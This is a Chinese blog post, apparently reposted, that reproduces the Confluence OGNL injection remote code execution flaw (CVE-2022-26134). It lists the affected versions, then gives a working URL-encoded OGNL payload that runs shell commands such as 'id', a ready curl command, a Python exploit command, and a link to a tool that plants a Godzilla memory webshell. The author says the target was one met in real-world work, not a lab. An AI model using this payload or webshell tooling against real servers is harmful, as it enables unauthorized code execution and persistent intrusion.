当前位置:网站首页>Confluence OGNL注入漏洞复现(CVE-2022-26134)
Confluence OGNL注入漏洞复现(CVE-2022-26134)
2022-07-30 17:43:00 【云舒_YunShu】
Confluence OGNL注入漏洞复现(CVE-2022-26134)
影响范围
Confluence Server&Data Center ≥ 1.3.0
Atlassian Confluence Server and Data Center <7.4.17
Atlassian Confluence Server and Data Center <7.13.7
Atlassian Confluence Server and Data Center <7.14.3
Atlassian Confluence Server and Data Center <7.15.2
Atlassian Confluence Server and Data Center <7.16.4
Atlassian Confluence Server and Data Center <7.17.4
Atlassian Confluence Server and Data Center <7.18.1
漏洞成因
Atlassian Confluence存在远程代码执行漏洞,2022年6月2日,Atlassian发布安全公告,公布了一个Confluence Server和Data Center中的远程代码执行漏洞。详细分析可参考:
https://www.anquanke.com/post/id/274026
漏洞利用
环境准备
| 名称 | IP |
|---|---|
| 攻击机 | 192.168.159.128 |
| 靶机 | xxx.xxx.xxx.xxx |
此处的靶机是我在实战里遇到的,另外该漏洞vulhub还未曾引入。
靶机截图如下:

漏洞复现
手动复现
POC:
/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/
测试:
curl -vv "http://xxx.xxx.xxx.xxx:8090/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Response%22%2C%23a%29%29%7D/"
可以看到如下图所示:

工具复现
准备好生成POC工具:cve-2022-26134.py
工具地址:https://github.com/Nwqda/CVE-2022-26134
然后执行下方的命令:
python cve-2022-26134.py "http://xxx.xxx.xxx.xxx:8090/" "id"

可以看到此漏洞利用成功!
附:一键连接哥斯拉生成工具:https://github.com/BeichenDream/CVE-2022-26134-Godzilla-MEMSHELL
边栏推荐
- bean的生命周期
- Google earth engine如何实现我们时间列表的排列和选取
- C陷阱与缺陷 第7章 可移植性缺陷 7.3 整数的大小
- ARC在编译期和运行期做了什么
- Informatics Olympiad 1915: [01NOIP Popularization Group] Greatest Common Divisor and Least Common Multiple | Luogu P1029 [NOIP2001 Popularization Group] The problem of the greatest common divisor and
- Dodging ice cream assassins?Crawling ice cream prices through crawlers
- (18)[系统调用]追踪系统调用(服务表)
- LayaBox---TypeScript---泛型
- Leetcode数据库系列题解合集(持续更新)
- windwons 下GPU环境和pytorch安装
猜你喜欢
![[HarekazeCTF2019] Avatar Uploader 1](/img/2c/6dde7b8d34ba0deb334b4283e1e30e.png)
[HarekazeCTF2019] Avatar Uploader 1

Hangzhou electric school game 2 1001 2022 Static Query on Tree (Tree + hash table difference chain subdivision

2022年杭电多校第2场 1001 Static Query on Tree(树链剖分+哈希表差分

matlab simulink锂离子电池智能充电策略研究

Research on intelligent charging strategy of matlab simulink lithium-ion battery

宝塔搭建PHP自适应懒人网址导航源码实测

华为无线设备配置Mesh业务

Insert data into MySQL in C language

分布式消息队列平滑迁移技术实战
![有效的括号字符串[贪心练习]](/img/1c/5cefb53bc4aba54dd79b0cc9b09b0d.png)
有效的括号字符串[贪心练习]
随机推荐
LayaBox---TypeScript---枚举
知识蒸馏3:YOLOV5项目准备
Analysis and Simulation of Short Circuit Fault in Power System Based on MATLAB
图卷积神经网络的数学原理——谱图理论和傅里叶变换初探
基于亚马逊云科技无服务器服务快速搭建电商平台——性能篇
超声波探伤仪是做什么用的?
This year..I sincerely recommend the professional engineer to upgrade to the book!
Wincc报表教程(SQL数据库的建立,wincc在数据库中保存和查询数据,调用Excel模板把数据保存到指定的位置和打印功能)
What ARC does at compile time and runtime
UE5第一人称射击游戏蓝图教程
ARC在编译期和运行期做了什么
MySQL中的存储过程(详细篇)
习题:变量、常量和基本数据类型
Error EPERM operation not permitted, mkdir 'Dsoftwarenodejsnode_cache_cacach Two solutions
Moralis去中心化Web3应用开发教程
基于MATLAB的电力系统短路故障分析与仿真
数据库系统原理与应用教程(064)—— MySQL 练习题:操作题 51-61(八):查询条件的构造、通配符
linux 安装mysql8.0 超详细教程(实战多次)
C陷阱与缺陷 第6章 预处理器 6.1 不能忽视宏定义中的空格
What is an ultrasonic flaw detector used for?